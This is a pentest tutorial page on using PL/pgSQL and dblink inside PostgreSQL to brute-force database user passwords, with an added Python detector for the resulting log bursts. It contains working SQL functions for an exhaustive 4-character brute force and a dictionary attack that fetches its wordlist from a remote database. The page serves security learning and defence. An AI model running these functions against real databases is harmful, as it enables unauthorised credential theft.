PL/pgSQL Password Bruteforce
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Find more information about these attacks in the original paper.
PL/pgSQL is a fully featured programming language that extends the capabilities of SQL by offering enhanced procedural control. This includes the use of loops and various control structures. Functions created in the PL/pgSQL language can be invoked by SQL statements and triggers, broadening the scope of operations within the database environment.
You can use this language to ask PostgreSQL to brute-force the users' credentials, but the language must be installed on the database. You can verify its presence with:
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |
By default, creating functions is a privilege granted to PUBLIC, where PUBLIC refers to every user on that database system. To prevent this, the administrator could have revoked the USAGE privilege on the language from PUBLIC:
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
In that case, our previous query would return a different result:
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}
Note that for the script to work, the dblink function needs to exist. If it is not present, you can try to create it with
CREATE EXTENSION dblink;
Password Brute Force
Here is how you could brute-force a 4-character password:
-- Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
                                       username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
    word TEXT;
BEGIN
    -- Integer FOR loops declare a, b, c and d implicitly; 65..122 spans 'A'..'z'
    FOR a IN 65..122 LOOP
    FOR b IN 65..122 LOOP
    FOR c IN 65..122 LOOP
    FOR d IN 65..122 LOOP
        BEGIN
            word := chr(a) || chr(b) || chr(c) || chr(d);
            -- dblink opens a new connection with the candidate password:
            -- a valid password returns the row, a wrong one raises a connection error
            PERFORM * FROM dblink(' host=' || host ||
                                  ' port=' || port ||
                                  ' dbname=' || dbname ||
                                  ' user=' || username ||
                                  ' password=' || word,
                                  'SELECT 1') AS t(i INT);
            RETURN word;
        EXCEPTION
            WHEN sqlclient_unable_to_establish_sqlconnection THEN
                NULL; -- wrong password, try the next candidate
        END;
    END LOOP;
    END LOOP;
    END LOOP;
    END LOOP;
    RETURN NULL;
END;
$$ LANGUAGE plpgsql;

-- Call the function
SELECT brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
Note that even brute-forcing 4 characters may take several minutes.
You can also download a wordlist and try only those passwords (dictionary attack):
-- Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
                                       username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
    word TEXT;
BEGIN
    -- Fetch the candidate passwords from a wordlist table on a remote database
    FOR word IN SELECT w.word FROM dblink('host=1.2.3.4
                                           user=name
                                           password=qwerty
                                           dbname=wordlists',
                                          'SELECT word FROM wordlist')
                                   AS w(word TEXT) LOOP
        BEGIN
            PERFORM * FROM dblink(' host=' || host ||
                                  ' port=' || port ||
                                  ' dbname=' || dbname ||
                                  ' user=' || username ||
                                  ' password=' || word,
                                  'SELECT 1') AS t(i INT);
            RETURN word;
        EXCEPTION
            WHEN sqlclient_unable_to_establish_sqlconnection THEN
                NULL; -- wrong password, try the next candidate
        END;
    END LOOP;
    RETURN NULL;
END;
$$ LANGUAGE plpgsql;

-- Call the function
SELECT brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
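Both variants above leave the same footprint in the server log: a burst of password authentication failures for one role whose client address is the database host itself, because dblink connects back from inside the server. The following Python detector is an added example and not part of the original page; the log_line_prefix '%m [%p] %h %u@%d ' and the sample log lines are assumptions constructed for it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed server setting: log_line_prefix = '%m [%p] %h %u@%d '
# (timestamp, pid, client host, user@database). Adjust LINE_RE for other prefixes.
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) \S+ \[\d+\] '
    r'(?P<host>\S+) \S+@\S+ FATAL:\s+password authentication failed '
    r'for user "(?P<user>[^"]+)"'
)

# Constructed sample log: six rapid failures whose client is the server itself
# (dblink connecting back to 127.0.0.1), plus one unrelated typo from a workstation.
SAMPLE_LOG = """\
2024-05-01 10:00:00.000 UTC [4101] 127.0.0.1 postgres@postgres LOG:  connection received: host=127.0.0.1 port=50001
2024-05-01 10:00:00.012 UTC [4101] 127.0.0.1 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:00.020 UTC [4102] 127.0.0.1 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:00.031 UTC [4103] 127.0.0.1 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:00.044 UTC [4104] 127.0.0.1 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:00.058 UTC [4105] 127.0.0.1 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:00.071 UTC [4106] 127.0.0.1 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:03:17.500 UTC [4200] 10.0.0.5 alice@app FATAL:  password authentication failed for user "alice"
""".splitlines()

def parse_auth_failures(lines):
    """Yield (timestamp, client_host, target_user) for every failed-login line."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m['ts'], '%Y-%m-%d %H:%M:%S.%f')
            yield ts, m['host'], m['user']

def detect_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {(host, user): peak_count} for sources that reached `threshold`
    failures inside a sliding `window`; a slow trickle never accumulates."""
    recent = defaultdict(list)
    alerts = {}
    for ts, host, user in sorted(parse_auth_failures(lines)):
        q = recent[(host, user)]
        q.append(ts)
        while q and ts - q[0] > window:   # expire timestamps older than the window
            q.pop(0)
        if len(q) >= threshold:
            alerts[(host, user)] = max(alerts.get((host, user), 0), len(q))
    return alerts
```

A hit keyed on the server's own loopback or listen address, rather than an application host, is the strongest indicator that the brute force runs inside the database; pair the alert with a check of pg_language ACLs and the installed dblink extension as shown earlier on this page.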